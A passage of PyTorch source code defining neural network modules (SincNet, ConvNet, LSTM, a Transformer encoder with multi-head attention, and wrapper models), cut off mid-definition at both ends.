self).__init__()\n\t\t\n\t\tself.input_dim=int(options['input_dim'])\n\t\tself.fc_lay=options['fc_lay']\n\t\tself.fc_drop=options['fc_drop']\n\t\tself.fc_use_batchnorm=options['fc_use_batchnorm']\n\t\tself.fc_use_laynorm=options['fc_use_laynorm']\n\t\tself.fc_use_laynorm_inp=options['fc_use_laynorm_inp']\n\t\tself.fc_use_batchnorm_inp=options['fc_use_batchnorm_inp']\n\t\tself.fc_act=options['fc_act']\n\t\t\n\t \n\t\tself.wx = nn.ModuleList([])\n\t\tself.bn = nn.ModuleList([])\n\t\tself.ln = nn.ModuleList([])\n\t\tself.act = nn.ModuleList([])\n\t\tself.drop = nn.ModuleList([])\n\t \n\n\t \n\t\t# input layer normalization\n\t\tif self.fc_use_laynorm_inp:\n\t\t\tself.ln0=LayerNorm(self.input_dim)\n\t\t\t\n\t\t# input batch normalization \n\t\tif self.fc_use_batchnorm_inp:\n\t\t\tself.bn0=nn.BatchNorm1d(self.input_dim,momentum=0.05)\n\t\t\t \n\t\t\t \n\t\tself.N_fc_lay=len(self.fc_lay)\n\t\t\t\t \n\t\tcurrent_input=self.input_dim\n\t\t\n\t\t# Initialization of hidden layers\n\t\t\n\t\tfor i in range(self.N_fc_lay):\n\t\t\t# dropout\n\t\t\tself.drop.append(nn.Dropout(p=self.fc_drop[i]))\n\t\t\n\t\t\t# activation\n\t\t\tself.act.append(act_fun(self.fc_act[i]))\n\n\t\t\tadd_bias=True\n\t\t\t \n\t\t\t# layer norm initialization\n\t\t\tself.ln.append(LayerNorm(self.fc_lay[i]))\n\t\t\tself.bn.append(nn.BatchNorm1d(self.fc_lay[i],momentum=0.05))\n\t\t\t \n\t\t\tif self.fc_use_laynorm[i] or self.fc_use_batchnorm[i]:\n\t\t\t\tadd_bias=False\n\t\t\t \n\t\t\t\t\t\t\n\t\t\t# Linear operations\n\t\t\tself.wx.append(nn.Linear(current_input, self.fc_lay[i],bias=add_bias))\n\t\t\t \n\t\t\t# weight initialization\n\t\t\tself.wx[i].weight = torch.nn.Parameter(torch.Tensor(self.fc_lay[i],current_input).uniform_(-np.sqrt(0.01/(current_input+self.fc_lay[i])),np.sqrt(0.01/(current_input+self.fc_lay[i]))))\n\t\t\tself.wx[i].bias = torch.nn.Parameter(torch.zeros(self.fc_lay[i]))\n\t\t\t \n\t\t\tcurrent_input=self.fc_lay[i]\n\t\t\t \n\t\t\t \n\tdef forward(self, x):\t\n\t\t# Applying Layer/Batch Norm\n\t\tif bool(self.fc_use_laynorm_inp):\n\t\t\tx=self.ln0((x))\n\t\t\t\n\t\tif bool(self.fc_use_batchnorm_inp):\n\t\t\tx=self.bn0(x.transpose(-1, -2)).transpose(-1, -2)\n\t\t\n\t\tfor i in range(self.N_fc_lay):\n\n\t\t\tif self.fc_act[i]!='linear':\n\t\t\t\tif self.fc_use_laynorm[i]:\n\t\t\t\t\tx = self.drop[i](self.act[i](self.ln[i](self.wx[i](x))))\n\t\t\t\t\n\t\t\t\telif self.fc_use_batchnorm[i]:\n\t\t\t\t\tx = self.drop[i](self.act[i](self.bn[i](self.wx[i](x).transpose(-1, -2)).transpose(-1, -2)))\n\n\t\t\t\telif self.fc_use_batchnorm[i]==False and self.fc_use_laynorm[i]==False:\n\t\t\t\t\tx = self.drop[i](self.act[i](self.wx[i](x)))\n\t\t\t\t \n\t\t\telse:\n\t\t\t\tif self.fc_use_laynorm[i]:\n\t\t\t\t\tx = self.drop[i](self.ln[i](self.wx[i](x)))\n\t\t\t\t\n\t\t\t\tif self.fc_use_batchnorm[i]:\n\t\t\t\t\tx = self.drop[i](self.bn[i](self.wx[i](x).transpose(-1, -2)).transpose(-1, -2))\n\t\t\t\t\n\t\t\t\tif self.fc_use_batchnorm[i]==False and self.fc_use_laynorm[i]==False:\n\t\t\t\t\tx = self.drop[i](self.wx[i](x)) \n\t\t\n\t\treturn x\n\n\nclass SincNet(nn.Module):\n\t\t\n\tdef __init__(self,options):\n\t\tsuper(SincNet,self).__init__()\n\t\n\t\tself.cnn_N_filt=options['cnn_N_filt']\n\t\tself.cnn_len_filt=options['cnn_len_filt']\n\t\tself.cnn_max_pool_len=options['cnn_max_pool_len']\n\t\t \n\t\t \n\t\tself.cnn_act=options['cnn_act']\n\t\tself.cnn_drop=options['cnn_drop']\n\t\t \n\t\tself.cnn_use_laynorm=options['cnn_use_laynorm']\n\t\tself.cnn_use_batchnorm=options['cnn_use_batchnorm']\n\t\tself.cnn_use_laynorm_inp=options['cnn_use_laynorm_inp']\n\t\tself.cnn_use_batchnorm_inp=options['cnn_use_batchnorm_inp']\n\t\t \n\t\tself.input_dim=int(options['input_dim'])\n\t\t \n\t\tself.fs=options['fs']\n\t\t \n\t\tself.N_cnn_lay=len(options['cnn_N_filt'])\n\t\tself.conv = nn.ModuleList([])\n\t\tself.bn = nn.ModuleList([])\n\t\tself.ln = nn.ModuleList([])\n\t\tself.act = nn.ModuleList([])\n\t\tself.drop = nn.ModuleList([])\n\t\t \n\t\t\t\t\t \n\t\tif self.cnn_use_laynorm_inp:\n\t\t\tself.ln0=LayerNorm(self.input_dim)\n\t\t\t\t \n\t\tif self.cnn_use_batchnorm_inp:\n\t\t\tself.bn0=nn.BatchNorm1d([self.input_dim],momentum=0.05)\n\t\t\t\t \n\t\tcurrent_input=self.input_dim \n\t\t \n\t\tfor i in range(self.N_cnn_lay):\n\t\t\t \n\t\t\tN_filt=int(self.cnn_N_filt[i])\n\t\t\tlen_filt=int(self.cnn_len_filt[i])\n\t\t\t \n\t\t\t# dropout\n\t\t\tself.drop.append(nn.Dropout(p=self.cnn_drop[i]))\n\t\t\t \n\t\t\t# activation\n\t\t\tself.act.append(act_fun(self.cnn_act[i]))\n\t\t\t\t\t\t\t\t\t\n\t\t\t# layer norm initialization \n\t\t\tself.ln.append(LayerNorm([N_filt,int((current_input-self.cnn_len_filt[i]+1)/self.cnn_max_pool_len[i])]))\n\n\t\t\tself.bn.append(nn.BatchNorm1d(N_filt,int((current_input-self.cnn_len_filt[i]+1)/self.cnn_max_pool_len[i]),momentum=0.05))\n\t\t\t\t\t\n\n\t\t\tif i==0:\n\t\t\t\tself.conv.append(SincConv_fast(self.cnn_N_filt[0],self.cnn_len_filt[0],self.fs))\n\t\t\t\t\t\t\n\t\t\telse:\n\t\t\t\tself.conv.append(nn.Conv1d(self.cnn_N_filt[i-1], self.cnn_N_filt[i], self.cnn_len_filt[i]))\n\t\t\t\t\n\t\t\tcurrent_input=int((current_input-self.cnn_len_filt[i]+1)/self.cnn_max_pool_len[i])\n\n\t\t\t \n\t\tself.out_dim=current_input*N_filt\n\n\n\n\tdef forward(self, x):\n\t\tbatch=x.shape[0]\n\t\tseq_len=x.shape[1]\n\t\t \n\t\tif bool(self.cnn_use_laynorm_inp):\n\t\t\tx=self.ln0((x))\n\t\t\t\n\t\tif bool(self.cnn_use_batchnorm_inp):\n\t\t\tx=self.bn0((x))\n\t\t\t\n\t\tx=x.view(batch,1,seq_len)\n\n\t\t \n\t\tfor i in range(self.N_cnn_lay):\n\t\t\t\t \n\t\t\tif self.cnn_use_laynorm[i]:\n\t\t\t\tif i==0:\n\t\t\t\t\tx = self.drop[i](self.act[i](self.ln[i](F.max_pool1d(torch.abs(self.conv[i](x)), self.cnn_max_pool_len[i])))) \n\t\t\t\telse:\n\t\t\t\t\tx = self.drop[i](self.act[i](self.ln[i](F.max_pool1d(self.conv[i](x), self.cnn_max_pool_len[i])))) \n\t\t\t\t\n\t\t\tif self.cnn_use_batchnorm[i]:\n\t\t\t\tx = self.drop[i](self.act[i](self.bn[i](F.max_pool1d(self.conv[i](x), self.cnn_max_pool_len[i]))))\n\n\t\t\tif self.cnn_use_batchnorm[i]==False and self.cnn_use_laynorm[i]==False:\n\t\t\t\tx = self.drop[i](self.act[i](F.max_pool1d(self.conv[i](x), self.cnn_max_pool_len[i])))\n\n\t\t \n\t\tx = x.view(batch,-1)\n\n\t\treturn x\n\nclass ConvNet(nn.Module):\n\t\t\n\tdef __init__(self,options):\n\t\tsuper(ConvNet,self).__init__()\n\t\n\t\tself.cnn_N_filt=options['cnn_N_filt']\n\t\tself.cnn_len_filt=options['cnn_len_filt']\n\t\tself.cnn_max_pool_len=options['cnn_max_pool_len']\n\t\t \n\t\t \n\t\tself.cnn_act=options['cnn_act']\n\t\tself.cnn_drop=options['cnn_drop']\n\t\t \n\t\tself.cnn_use_laynorm=options['cnn_use_laynorm']\n\t\tself.cnn_use_batchnorm=options['cnn_use_batchnorm']\n\t\tself.cnn_use_laynorm_inp=options['cnn_use_laynorm_inp']\n\t\tself.cnn_use_batchnorm_inp=options['cnn_use_batchnorm_inp']\n\t\t \n\t\tself.input_dim=int(options['input_dim'])\n\t\t \n\t\tself.fs=options['fs']\n\t\t \n\t\tself.N_cnn_lay=len(options['cnn_N_filt'])\n\t\tself.conv = nn.ModuleList([])\n\t\tself.bn = nn.ModuleList([])\n\t\tself.ln = nn.ModuleList([])\n\t\tself.act = nn.ModuleList([])\n\t\tself.drop = nn.ModuleList([])\n\t\t \n\t\t\t\t\t \n\t\tif self.cnn_use_laynorm_inp:\n\t\t\tself.ln0=LayerNorm(self.input_dim)\n\t\t\t\t \n\t\tif self.cnn_use_batchnorm_inp:\n\t\t\tself.bn0=nn.BatchNorm1d([self.input_dim],momentum=0.05)\n\t\t\t\t \n\t\tcurrent_input=self.input_dim \n\t\t \n\t\tfor i in range(self.N_cnn_lay):\n\t\t\t \n\t\t\tN_filt=int(self.cnn_N_filt[i])\n\t\t\tlen_filt=int(self.cnn_len_filt[i])\n\t\t\t \n\t\t\t# dropout\n\t\t\tself.drop.append(nn.Dropout(p=self.cnn_drop[i]))\n\t\t\t \n\t\t\t# activation\n\t\t\tself.act.append(act_fun(self.cnn_act[i]))\n\t\t\t\t\t\t\t\t\t\n\t\t\t# layer norm initialization \n\t\t\tself.ln.append(LayerNorm([N_filt,int((current_input-self.cnn_len_filt[i]+1)/self.cnn_max_pool_len[i])]))\n\n\t\t\tself.bn.append(nn.BatchNorm1d(N_filt,int((current_input-self.cnn_len_filt[i]+1)/self.cnn_max_pool_len[i]),momentum=0.05))\n\t\t\t\t\t\n\n\t\t\tif i==0:\n\t\t\t\tself.conv.append(nn.Conv1d(8, self.cnn_N_filt[i], self.cnn_len_filt[i]))\n\t\t\t\t\t\t\n\t\t\telse:\n\t\t\t\tself.conv.append(nn.Conv1d(self.cnn_N_filt[i-1], self.cnn_N_filt[i], self.cnn_len_filt[i]))\n\t\t\t\t\n\t\t\tcurrent_input=int((current_input-self.cnn_len_filt[i]+1)/self.cnn_max_pool_len[i])\n\n\t\t\t \n\t\tself.out_dim=current_input*N_filt\n\n\n\n\tdef forward(self, x):\n\t\tx = x.transpose(1, 2)\n\t\tbatch=x.shape[0]\n\t\tseq_len=x.shape[1]\n\t\t \n\t\tif bool(self.cnn_use_laynorm_inp):\n\t\t\tx=self.ln0((x))\n\t\t\t\n\t\tif bool(self.cnn_use_batchnorm_inp):\n\t\t\tx=self.bn0((x))\n\t\t\n\t\tx=x.view(batch,1,seq_len)\n\t\t \n\t\tfor i in range(self.N_cnn_lay):\n\t\t\t\t \n\t\t\tif self.cnn_use_laynorm[i]:\n\t\t\t\tx = self.drop[i](self.act[i](self.ln[i](F.max_pool1d(self.conv[i](x), self.cnn_max_pool_len[i])))) \n\t\t\t\t\n\t\t\tif self.cnn_use_batchnorm[i]:\n\t\t\t\tx = self.drop[i](self.act[i](self.bn[i](F.max_pool1d(self.conv[i](x), self.cnn_max_pool_len[i]))))\n\n\t\t\tif self.cnn_use_batchnorm[i]==False and self.cnn_use_laynorm[i]==False:\n\t\t\t\tx = self.drop[i](self.act[i](F.max_pool1d(self.conv[i](x), self.cnn_max_pool_len[i])))\n\n\t\t \n\t\tx = x.view(batch,-1)\n\n\t\treturn x\n\n\n\nclass LSTM(nn.Module):\n\tdef __init__(self,\n\t\t\t\t embed_dim=8,\n\t\t\t\t hidden_size=128,\n\t\t\t\t num_layers=4,\n\t\t\t\t bidirectional=True,\n\t\t\t\t dropout_in=0.25,\n\t\t\t\t dropout_out=0.25):\n\n\t\tsuper(LSTM, self).__init__()\n\n\t\tself.dropout_in = dropout_in\n\t\tself.dropout_out = dropout_out\n\t\tself.bidirectional = bidirectional\n\t\tself.hidden_size = hidden_size\n\t\tself.out_dim = 2 * hidden_size if bidirectional else hidden_size\n\n\t\t\n\t\tdropout_lstm = dropout_out if num_layers > 1 else 0.\n\t\tself.lstm = nn.LSTM(input_size=embed_dim,\n\t\t\t\t\t\t\t\t\t\t\t\thidden_size=hidden_size,\n\t\t\t\t\t\t\t\t\t\t\t\tnum_layers=num_layers,\n\t\t\t\t\t\t\t\t\t\t\t\tdropout=dropout_lstm,\n\t\t\t\t\t\t\t\t\t\t\t\tbidirectional=bidirectional)\n\n\tdef forward(self, src_embeddings):\n\t\t\"\"\" Performs a single forward pass through the instantiated encoder sub-network. \"\"\"\n\t\t# Embed tokens and apply dropout\n\t\tbatch_size, src_time_steps, embed_dim = src_embeddings.size()\n\t\tsrc_lengths = [src_time_steps] * batch_size\n\t\t_src_embeddings = F.dropout(src_embeddings, p=self.dropout_in, training=self.training)\n\n\t\t# Transpose batch: [batch_size, src_time_steps, num_features] -> [src_time_steps, batch_size, num_features]\n\t\tsrc_embeddings = _src_embeddings.transpose(0, 1)\n\n\t\t# Pack embedded tokens into a PackedSequence\n\t\tpacked_source_embeddings = nn.utils.rnn.pack_padded_sequence(src_embeddings, src_lengths)\n\n\t\t# Pass source input through the recurrent layer(s)\n\t\tpacked_outputs, (final_hidden_states, final_cell_states) = self.lstm(packed_source_embeddings)\n\n\t\t# Unpack LSTM outputs and optionally apply dropout (dropout currently disabled)\n\t\tlstm_output, _ = nn.utils.rnn.pad_packed_sequence(packed_outputs, padding_value=0.)\n\t\tlstm_output = F.dropout(lstm_output, p=self.dropout_out, training=self.training)\n\t\tassert list(lstm_output.size()) == [src_time_steps, batch_size, self.out_dim] # sanity check\n\t\t\n\t\tlstm_output = lstm_output.transpose(0, 1)\n\n\t\treturn lstm_output\n\n\n\ndef make_positions(tensor, padding_idx, left_pad):\n\t\"\"\"Replace non-padding symbols with their position numbers.\n\tPosition numbers begin at padding_idx+1.\n\tPadding symbols are ignored, but it is necessary to specify whether padding\n\tis added on the left side (left_pad=True) or right side (left_pad=False).\n\t\"\"\"\n\tmax_pos = padding_idx + 1 + tensor.size(1)\n\tif not hasattr(make_positions, 'range_buf'):\n\t\tmake_positions.range_buf = tensor.new()\n\tmake_positions.range_buf = make_positions.range_buf.type_as(tensor)\n\tif make_positions.range_buf.numel() < max_pos:\n\t\ttorch.arange(padding_idx + 1, max_pos, out=make_positions.range_buf)\n\tmask = tensor.ne(padding_idx)\n\tpositions = make_positions.range_buf[:tensor.size(1)].expand_as(tensor)\n\tif left_pad:\n\t\tpositions = positions - mask.size(1) + mask.long().sum(dim=1).unsqueeze(1)\n\treturn tensor.clone().masked_scatter_(mask, positions[mask])\n\nclass LearnedPositionalEmbedding(nn.Embedding):\n\t\"\"\"This module learns positional embeddings up to a fixed maximum size.\n\tPadding symbols are ignored, but it is necessary to specify whether padding\n\tis added on the left side (left_pad=True) or right side (left_pad=False).\n\t\"\"\"\n\n\tdef __init__(self, num_embeddings, embedding_dim, padding_idx, left_pad):\n\t\tsuper().__init__(num_embeddings, embedding_dim, padding_idx)\n\t\tself.left_pad = left_pad\n\n\tdef forward(self, input, incremental_state=None):\n\t\t\"\"\"Input is expected to be of size [bsz x seqlen].\"\"\"\n\t\tif incremental_state is not None:\n\t\t\t# positions is the same for every token when decoding a single step\n\t\t\tpositions = input.data.new(1, 1).fill_(self.padding_idx + input.size(1))\n\t\telse:\n\t\t\tpositions = make_positions(input.data, self.padding_idx, self.left_pad)\n\t\treturn super().forward(Variable(positions))\n\n\tdef max_positions(self):\n\t\t\"\"\"Maximum number of supported positions.\"\"\"\n\t\treturn self.num_embeddings - self.padding_idx - 1\n\n\nclass SinusoidalPositionalEmbedding(nn.Module):\n\t\"\"\"This module produces sinusoidal positional embeddings of any length.\n\tPadding symbols are ignored, but it is necessary to specify whether padding\n\tis added on the left side (left_pad=True) or right side (left_pad=False).\n\t\"\"\"\n\n\tdef __init__(self, embedding_dim, padding_idx, left_pad, init_size=1024):\n\t\tsuper().__init__()\n\t\tself.embedding_dim = embedding_dim\n\t\tself.padding_idx = padding_idx\n\t\tself.left_pad = left_pad\n\t\tself.register_buffer(\n\t\t\t'weights',\n\t\t\tSinusoidalPositionalEmbedding.get_embedding(\n\t\t\t\tinit_size,\n\t\t\t\tembedding_dim,\n\t\t\t\tpadding_idx,\n\t\t\t),\n\t\t)\n\n\t@staticmethod\n\tdef get_embedding(num_embeddings, embedding_dim, padding_idx=None):\n\t\t\"\"\"Build sinusoidal embeddings.\n\t\tThis matches the implementation in tensor2tensor, but differs slightly\n\t\tfrom the description in Section 3.5 of \"Attention Is All You Need\".\n\t\t\"\"\"\n\t\thalf_dim = embedding_dim // 2\n\t\temb = math.log(10000) / (half_dim - 1)\n\t\temb = torch.exp(torch.arange(half_dim) * -emb)\n\t\temb = torch.arange(num_embeddings).unsqueeze(1) * emb.unsqueeze(0)\n\t\temb = torch.cat([torch.sin(emb), torch.cos(emb)], dim=1).view(num_embeddings, -1)\n\t\tif embedding_dim % 2 == 1:\n\t\t\t# zero pad\n\t\t\temb = torch.cat([emb, torch.zeros(num_embeddings, 1)], dim=1)\n\t\tif padding_idx is not None:\n\t\t\temb[padding_idx, :] = 0\n\t\treturn emb\n\n\tdef forward(self, input, incremental_state=None):\n\t\t\"\"\"Input is expected to be of size [bsz x seqlen].\"\"\"\n\t\t# recompute/expand embeddings if needed\n\t\tbsz, seq_len = input.size()\n\t\tmax_pos = self.padding_idx + 1 + seq_len\n\t\tif max_pos > self.weights.size(0):\n\t\t\tself.weights = SinusoidalPositionalEmbedding.get_embedding(\n\t\t\t\tmax_pos,\n\t\t\t\tself.embedding_dim,\n\t\t\t\tself.padding_idx,\n\t\t\t).type_as(self.weights)\n\t\tweights = Variable(self.weights)\n\n\t\tif incremental_state is not None:\n\t\t\t# positions is the same for every token when decoding a single step\n\t\t\treturn weights[self.padding_idx + seq_len, :].expand(bsz, 1, -1)\n\n\t\tpositions = Variable(make_positions(input.data, self.padding_idx, self.left_pad))\n\t\treturn weights.index_select(0, positions.view(-1)).view(bsz, seq_len, -1)\n\n\tdef max_positions(self):\n\t\t\"\"\"Maximum number of supported positions.\"\"\"\n\t\treturn int(1e5) # an arbitrary large number\n\n\nclass LayerNormalization(nn.Module):\n\t\"\"\"Layer normalization for module\"\"\"\n\n\tdef __init__(self, hidden_size, eps=1e-6, affine=True):\n\t\tsuper(LayerNormalization, self).__init__()\n\n\t\tself.affine = affine\n\t\tself.eps = eps\n\t\tif self.affine:\n\t\t\tself.gamma = nn.Parameter(torch.ones(hidden_size))\n\t\t\tself.beta = nn.Parameter(torch.zeros(hidden_size))\n\n\tdef forward(self, x):\n\t\tmean = x.mean(-1, keepdim=True)\n\t\tstd = x.std(-1, keepdim=True)\n\t\treturn self.gamma * (x - mean) / (std + self.eps) + self.beta\n\n\ndef PositionalEmbedding(num_embeddings, embedding_dim, padding_idx, left_pad):\n\tm = LearnedPositionalEmbedding(num_embeddings, embedding_dim, padding_idx, left_pad)\n\tm.weight.data.normal_(0, 0.1)\n\treturn m\n\ndef residual(x, y, dropout, training):\n\t\"\"\"Residual connection\"\"\"\n\ty = F.dropout(y, p=dropout, training=training)\n\treturn x + y\n\ndef Linear(in_features, out_features, bias=True, dropout=0):\n\t\"\"\"Weight-normalized Linear layer (input: N x T x C)\"\"\"\n\tm = nn.Linear(in_features, out_features, bias=bias)\n\tm.weight.data.uniform_(-0.1, 0.1)\n\tif bias:\n\t\tm.bias.data.uniform_(-0.1, 0.1)\n\treturn m\n\ndef split_heads(x, num_heads):\n\t\"\"\"split x into multi heads\n\tArgs:\n\t\tx: [batch_size, length, depth]\n\tReturns:\n\t\ty: [[batch_size, length, depth / num_heads] x heads]\n\t\"\"\"\n\tsz = x.size()\n\t# x -> [batch_size, length, heads, depth / num_heads]\n\tx = x.view(sz[0], sz[1], num_heads, sz[2] // num_heads)\n\t# [batch_size, length, 1, depth // num_heads] * \n\theads = torch.chunk(x, num_heads, 2)\n\tx = []\n\tfor i in range(num_heads):\n\t\tx.append(torch.squeeze(heads[i], 2))\n\treturn x\n\ndef combine_heads(x):\n\t\"\"\"combine multi heads\n\tArgs:\n\t\tx: [batch_size, length, depth / num_heads] x heads\n\tReturns:\n\t\tx: [batch_size, length, depth]\n\t\"\"\"\n\treturn torch.cat(x, 2)\n\n\ndef dot_product_attention(q, k, v, bias, dropout, to_weights=False):\n\t\"\"\"dot product for query-key-value\n\tArgs:\n\t\tq: query antecedent, [batch, length, depth]\n\t\tk: key antecedent, [batch, length, depth]\n\t\tv: value antecedent, [batch, length, depth]\n\t\tbias: masked matrix\n\t\tdropout: dropout rate\n\t\tto_weights: whether to print weights\n\t\"\"\"\n\t# [batch, length, depth] x [batch, depth, length] -> [batch, length, length]\n\tlogits = torch.bmm(q, k.transpose(1, 2).contiguous())\n\tif bias is not None:\n\t\tlogits += bias\n\tsize = logits.size()\n\tweights = F.softmax(logits.view(size[0] * size[1], size[2]), dim=1)\n\tweights = weights.view(size)\n\tif to_weights:\n\t\treturn torch.bmm(weights, v), weights\n\telse:\n\t\treturn torch.bmm(weights, v)\n\n\nclass FeedForwardNetwork(nn.Module):\n\tdef __init__(self, hidden_size, filter_size, dropout):\n\t\tsuper(FeedForwardNetwork, self).__init__()\n\t\tself.fc1 = Linear(hidden_size, filter_size, bias=False)\n\t\tself.fc2 = Linear(filter_size, hidden_size, bias=False)\n\t\tself.dropout = dropout\n\n\tdef forward(self, x):\n\t\tx = F.relu(self.fc1(x))\n\t\tx = F.dropout(x, p=self.dropout, training=self.training)\n\t\tx = self.fc2(x)\n\t\treturn x\n\n\nclass MultiheadAttention(nn.Module):\n\t\"\"\"Multi-head attention mechanism\"\"\"\n\tdef __init__(self, \n\t\t\t\t key_depth, value_depth, output_depth,\n\t\t\t\t num_heads, dropout=0.1):\n\t\tsuper(MultiheadAttention, self).__init__()\n\n\t\tself._query = Linear(key_depth, key_depth, bias=False)\n\t\tself._key = Linear(key_depth, key_depth, bias=False)\n\t\tself._value = Linear(value_depth, value_depth, bias=False)\n\t\tself.output_perform = Linear(value_depth, output_depth, bias=False)\n\n\t\tself.num_heads = num_heads\n\t\tself.key_depth_per_head = key_depth // num_heads\n\t\tself.dropout = dropout\n\t\t\n\tdef forward(self, query_antecedent, memory_antecedent, bias, to_weights=False):\n\t\tif memory_antecedent is None:\n\t\t\tmemory_antecedent = query_antecedent\n\t\tq = self._query(query_antecedent)\n\t\tk = self._key(memory_antecedent)\n\t\tv = self._value(memory_antecedent)\n\t\tq *= self.key_depth_per_head ** -0.5\n\t\t\n\t\t# split heads\n\t\tq = split_heads(q, self.num_heads)\n\t\tk = split_heads(k, self.num_heads)\n\t\tv = split_heads(v, self.num_heads)\n\n\t\tx = []\n\t\tavg_attn_scores = None\n\t\tfor i in range(self.num_heads):\n\t\t\tresults = dot_product_attention(q[i], k[i], v[i],\n\t\t\t\t\t\t\t\t\t\t\tbias,\n\t\t\t\t\t\t\t\t\t\t\tself.dropout,\n\t\t\t\t\t\t\t\t\t\t\tto_weights)\n\t\t\tif to_weights:\n\t\t\t\ty, attn_scores = results\n\t\t\t\tif avg_attn_scores is None:\n\t\t\t\t\tavg_attn_scores = attn_scores\n\t\t\t\telse:\n\t\t\t\t\tavg_attn_scores.add_(attn_scores)\n\t\t\telse:\n\t\t\t\ty = results\n\t\t\tx.append(y)\n\t\tx = combine_heads(x)\n\t\tx = self.output_perform(x)\n\t\tif to_weights:\n\t\t\treturn x, avg_attn_scores / self.num_heads\n\t\telse:\n\t\t\treturn x\n\ndef attention_bias_ignore_padding(src_tokens, padding_idx):\n\t\"\"\"Calculate the padding mask based on which embedding are zero\n\tArgs:\n\t\tsrc_tokens: [batch_size, length]\n\tReturns:\n\t\tbias: [batch_size, length]\n\t\"\"\"\n\treturn src_tokens.eq(padding_idx).unsqueeze(1)\n\ndef encoder_attention_bias(bias):\n\tbatch_size, _, length = bias.size()\n\treturn bias.expand(batch_size, length, length).float() * -1e9\n\n\nclass TransformerEncoder(nn.Module):\n\t\"\"\"Transformer encoder.\"\"\"\n\tdef __init__(self, embed_dim=256, max_positions=1024, pos=\"learned\",\n\t\t\t\t num_layers=4, num_heads=8,\n\t\t\t\t filter_size=256, hidden_size=256,\n\t\t\t\t dropout=0.1, attention_dropout=0.1, relu_dropout=0.1, cuda=True):\n\t\tsuper(TransformerEncoder, self).__init__()\n\t\tassert pos == \"learned\" or pos == \"timing\" or pos == \"nopos\"\n\n\t\tself.cuda = cuda\n\n\t\tself.dropout = dropout\n\t\tself.attention_dropout = attention_dropout\n\t\tself.relu_dropout = relu_dropout\n\t\tself.pos = pos\n\n\t\tpadding_idx = 0\n\t\tif self.pos == \"learned\":\n\t\t\tself.embed_positions = PositionalEmbedding(max_positions, embed_dim, padding_idx,\n\t\t\t\t\t\t\t\t\t\t\t\t\t left_pad=False)\n\t\tif self.pos == \"timing\":\n\t\t\tself.embed_positions = SinusoidalPositionalEmbedding(embed_dim, padding_idx,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t left_pad=False)\n\n\t\tself.layers = num_layers\n\n\t\tself.self_attention_blocks = nn.ModuleList()\n\t\tself.ffn_blocks = nn.ModuleList()\n\t\tself.norm1_blocks = nn.ModuleList()\n\t\tself.norm2_blocks = nn.ModuleList()\n\t\tfor i in range(num_layers):\n\t\t\tself.self_attention_blocks.append(MultiheadAttention(hidden_size,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t hidden_size,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t hidden_size,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t num_heads))\n\t\t\tself.ffn_blocks.append(FeedForwardNetwork(hidden_size, filter_size, relu_dropout))\n\t\t\tself.norm1_blocks.append(LayerNormalization(hidden_size))\n\t\t\tself.norm2_blocks.append(LayerNormalization(hidden_size))\n\t\tself.out_norm = LayerNormalization(hidden_size)\n\n\tdef forward(self, encoder_input):\n\t\t# embed tokens plus positions\n\t\tbatch_size, src_time_steps, embed_dim = encoder_input.size()\n\t\tsrc_lengths = [src_time_steps] * batch_size\n\t\tsrc_tokens = encoder_input[:, :, 0]\n\t\tpadding_idx = 0\n\t\tinput_to_padding = attention_bias_ignore_padding(src_tokens, padding_idx)\n\t\tencoder_self_attention_bias = encoder_attention_bias(input_to_padding)\n\t\tif self.pos != \"nopos\":\n\t\t\tif self.cuda:\n\t\t\t\tencoder_input += self.embed_positions(src_tokens.type(torch.cuda.LongTensor))\n\t\t\telse:\n\t\t\t\tencoder_input += self.embed_positions(src_tokens.type(torch.LongTensor))\n\n\t\tx = F.dropout(encoder_input, p=self.dropout, training=self.training)\n\t\tfor self_attention, ffn, norm1, norm2 in zip(self.self_attention_blocks,\n\t\t\t\t\t\t\t\t\t\t\t\t\t self.ffn_blocks,\n\t\t\t\t\t\t\t\t\t\t\t\t\t self.norm1_blocks,\n\t\t\t\t\t\t\t\t\t\t\t\t\t self.norm2_blocks):\n\t\t\ty = self_attention(norm1(x), None, encoder_self_attention_bias)\n\t\t\tx = residual(x, y, self.dropout, self.training)\n\t\t\ty = ffn(norm2(x))\n\t\t\tx = residual(x, y, self.dropout, self.training)\n\t\tx = self.out_norm(x)\n\t\treturn x\n\n\tdef max_positions(self):\n\t\t\"\"\"Maximum input length supported by the encoder.\"\"\"\n\t\tif self.pos == \"learned\":\n\t\t\treturn self.embed_positions.max_positions()\n\t\telse:\n\t\t\treturn 1024\n\t\t \n\nclass FunTimesCNN(nn.Module):\n\n\tdef __init__(self, MLP_before_arch, MLP_after_arch, CNN_arch, use_sinc_net):\n\t\tsuper(FunTimes, self).__init__()\n\t\tif MLP_before_arch != None:\n\t\t\tself.embed_dim_projection = MLP_for_me(MLP_before_arch)\n\t\telse:\n\t\t\tself.embed_dim_projection = None\n\n\t\tif use_sinc_net:\n\t\t\tself.CNN_net = SincNet(CNN_arch)\n\t\telse:\n\t\t\tself.CNN_net = ConvNet(CNN_arch)\n\t\tself.result_projection = MLP_for_me(MLP_after_arch)\n\t\t\n\tdef forward(self, x):\n\t\tif self.embed_dim_projection:\n\t\t\tx = self.embed_dim_projection(x)\n\t\treturn self.result_projection(self.CNN_net(x))\n\nclass FunTimesLSTM(nn.Module):\n\n\tdef __init__(self, MLP_before_arch, MLP_after_arch, lstm_embed_dim, lstm_hidden_size, lstm_num_layers, lstm_bidirectional, lstm_dropout_in, lstm_dropout_out, raw=False):\n\t\tsuper(FunTimesLSTM, self).__init__()\n\n\t\tif MLP_before_arch != None:\n\t\t\tself.embed_dim_projection = MLP_for_me(MLP_before_arch)\n\t\telse:\n\t\t\tself.embed_dim_projection = None\n\t\tself.LSTM = LSTM(lstm_embed_dim, lstm_hidden_size, lstm_num_layers, lstm_bidirectional, lstm_dropout_in, lstm_dropout_out)\n\t\tself.result_projection = MLP_for_me(MLP_after_arch)\n\t\tself.raw = raw\n\t\t\n\tdef forward(self, x):\n\t\tif self.raw:\n\t\t\tx = x.unsqueeze(-1)\n\t\tif self.embed_dim_projection:\n\t\t\tx = self.embed_dim_projection(x)\n\t\tx = self.LSTM(x)\n\t\tx = self.result_projection(x)\n\t\treturn x.squeeze(-1)\n\n\nclass FunTimesTransformer(nn.Module):\n\n\tdef __init__(self, MLP_before_arch, MLP_after_arch, tr_embed_dim, tr_max_positions, tr_pos, tr_num_layers,\n\t\ttr_num_heads, tr_filter_size, 